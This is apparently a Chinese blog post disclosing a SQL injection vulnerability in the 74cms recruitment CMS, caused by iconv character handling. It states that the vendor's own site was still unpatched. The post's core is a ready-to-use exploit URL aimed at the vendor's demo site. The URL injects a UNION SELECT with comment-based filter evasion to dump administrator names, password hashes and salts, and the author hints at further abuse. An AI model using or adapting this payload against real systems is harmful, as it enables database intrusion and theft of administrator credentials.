74cms最新通杀注入漏洞 – 网站安全

一个iconv引发的猪肉

经过测试官网居然没补。。。

74cms最新通杀注入漏洞 – 网站安全 – 自学php插图

md5解不开，但是可以用来爆各种信息你懂的

exp:http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《74cms最新通杀注入漏洞 – 网站安全 – 自学php》